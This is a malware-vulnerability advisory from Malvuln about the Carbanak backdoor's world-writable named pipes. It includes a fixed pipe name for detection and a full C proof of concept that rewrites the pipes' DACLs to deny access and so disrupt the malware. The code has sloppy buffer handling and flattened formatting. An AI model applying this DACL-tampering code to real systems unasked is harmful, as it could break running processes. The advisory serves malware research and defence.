Headline
Backdoor.Win32 Carbanak (Anunak) MVID-2024-0667 Named Pipe NULL DACL
Backdoor.Win32 Carbanak (Anunak) malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b8e1e5b832e5947f41fd6ae6ef6d09a1.txtContact: [email protected]: twitter.com/malvulnThreat: Backdoor.Win32 Carbanak (Anunak)Vulnerability: Named Pipe Null DACLFamily: CarbanakType: PE32MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1Vuln ID: MVID-2024-0667Dropped files: AlhEXlUJ.exe, AlhEXlUJbVpfX1EMVw.binDisclosure: 01/09/2024Description: Carbanak malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.Low privileged users can modify the pipes DACLs, removing rights for Everyone denying access to all users. First 6 pipes are created by its parent processand last 2 by the child process. The pipes names are randomly generated each time it is run all except for one JFNfVUYDXmlZQV.Therefore, we can detect Carbanak by that one pipe, as the "JFNfVUYDXmlZQVI" pipe is always created regardless of other randomly named pipes.Listing Carbanaks named pipes they get grouped as they are created at same time with 2 of them listed prior to the JFNfVUYDXmlZQVI pipe.Carbanak creates a directory named "Mozilla" under ProgramData with hidden files, one of which is AlhEXlUJ.exe used by the service it creates which runs as SYSTEM. The malwares service names created seem to use an already existing service name and add "Sys" at the end of its name.Exploitation steps, output all named pipes and look for "JFNfVUYDXmlZQVI" if detected, exploit the DACL on 2 previously listed pipes and 5 pipes listed after.Successfully tested in VM environment.Carbanak IPC Named Pipes:\\.\Pipe\cltjLnYRKKjUESTvgGdmERTb RW Everyone\\.\Pipe\tGYNSgZvVXwumEhdcF RW Everyone\\.\Pipe\JFNfVUYDXmlZQVI <===== ALWAYS CREATED RW Everyone\\.\Pipe\PoUXbOHFRuUZAufnlpMZoqdtIfOX RW Everyone\\.\Pipe\oBcVHguxbnjGbSgkJptifqvNFgD RW Everyone\\.\Pipe\iDToHxpSCbEIEHPBeQ RW Everyone\\.\Pipe\YutsGUYwwUusszByeuXUQK RW Everyone\\.\Pipe\UfnQmAUTVtEkYvMoUWAZekAuWZHe RW EveryoneExploit/PoC:#include "windows.h"#include "stdio.h"#include "accctrl.h"#include "aclapi.h"/*Carbanak: 48d208b87b29d50bb160f336c94b681e232b0f90e8c02175e593d60737369c13DACL IPC named pipes created and grants RW access for Everyone.We can identify Carbanak as out of the eight pipes it creates with random names the pipenamed JFNfVUYDXmlZQVI is always created. Pipes are typically grouped as they are createdat same time and typically 2 are previous to pipe JFNfVUYDXmlZQVI and others are created afterOutput named pipes find JFNfVUYDXmlZQVI and exploit DACL on 2 previous and 5 after.Successfully tested in VM environment.By Malvuln**//** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/#define CARBANAK_PIPE "JFNfVUYDXmlZQVI"#define MAX_TOKENS 1024#define DELIMITER "\n"int str2Array(char*** argv, char *str);int Exploit(char *carbanak_pipe);int str2Array(char*** argv, char *str){char* buffer;int argc;buffer = (char *) malloc(strlen(str) * sizeof(char));strcpy(buffer, str);(*argv) = (char**) malloc(MAX_TOKENS * sizeof(char**)); argc = 0; (*argv)[argc++] = strtok(buffer, DELIMITER); while ((((*argv)[argc] = strtok(NULL, DELIMITER)) != NULL) && (argc < MAX_TOKENS)) ++argc;return argc;}int main(void){system("dir /b \\\\.\\pipe\\\\ > tmp.sys");int ch;char tmp[1];FILE *fp = fopen("tmp.sys", "r");fseek(fp, 0, SEEK_END);int bytes = ftell(fp) + 256;rewind(fp);char x[bytes]; while((ch = fgetc(fp)) != EOF){ if(feof(fp)){ break; } sprintf(tmp, "%c", ch); strcat(x, tmp);}fclose(fp);char **A;int i, result = str2Array(&A, x);int delay = 300;int rc;BOOL infected=FALSE;for(i=0;i<result;i++){ if(strcmp(A[i], CARBANAK_PIPE)==0){ printf("[+] Carbanak (Anunak) malware IPC exploit\n"); printf("[!] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n"); printf("[!] Named Pipe %s%s\n", CARBANAK_PIPE, " detected!"); printf("[+] Attack started...\n\n"); infected = TRUE; Exploit(A[i]); Sleep(delay); Exploit(A[i-2]); Sleep(delay); Exploit(A[i-1]); Sleep(delay); Exploit(A[i+1]); Sleep(delay); Exploit(A[i+2]); Sleep(delay); Exploit(A[i+3]); Sleep(delay); Exploit(A[i+4]); Sleep(delay); rc = Exploit(A[i+5]); }} if(!infected){ printf("[+] Carbanak (Anunak) malware IPC Exploit \n"); printf("[+] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n"); printf("[!] Named Pipe %s%s", CARBANAK_PIPE, " not found on the system.\n"); printf("[!] Aborting..."); } if(rc==0){ printf("\n[!] Done!"); } printf("\n[+] By Malvuln circa 2024\n\n"); system("pause"); return 0;}int Exploit(char *malpipe){ char MALPIPE_PREFIX[269] = "\\\\.\\pipe\\"; strcat(MALPIPE_PREFIX, malpipe); HANDLE hPipe = CreateFileA((LPCSTR)MALPIPE_PREFIX, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, 0, NULL); PACL pOldDACL = NULL; PACL pNewDACL = NULL; if (hPipe == INVALID_HANDLE_VALUE){ int rc = GetLastError(); if(rc==5){ printf("[!] Access Denied for pipe: %s\n", malpipe); } return 1;} if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){ printf("[!] Error: %d", GetLastError()); return 1; } TRUSTEE trustee[1]; trustee[0].TrusteeForm = TRUSTEE_IS_NAME; trustee[0].TrusteeType = TRUSTEE_IS_GROUP; trustee[0].ptstrName = TEXT("Everyone"); trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE; trustee[0].pMultipleTrustee = NULL; EXPLICIT_ACCESS explicit_access_list[1]; ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS)); explicit_access_list[0].grfAccessMode = DENY_ACCESS; explicit_access_list[0].grfAccessPermissions = GENERIC_ALL; explicit_access_list[0].grfInheritance = NO_INHERITANCE; explicit_access_list[0].Trustee = trustee[0]; if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){ printf("[!] Error: %d", GetLastError()); return 1; } if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ printf("[!] Error: %d", GetLastError()); return 1; }else{ printf("[+] Modifying IPC Pipe DACL ==> %s\n", MALPIPE_PREFIX); } LocalFree(pNewDACL); LocalFree(pOldDACL); CloseHandle(hPipe); return 0;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).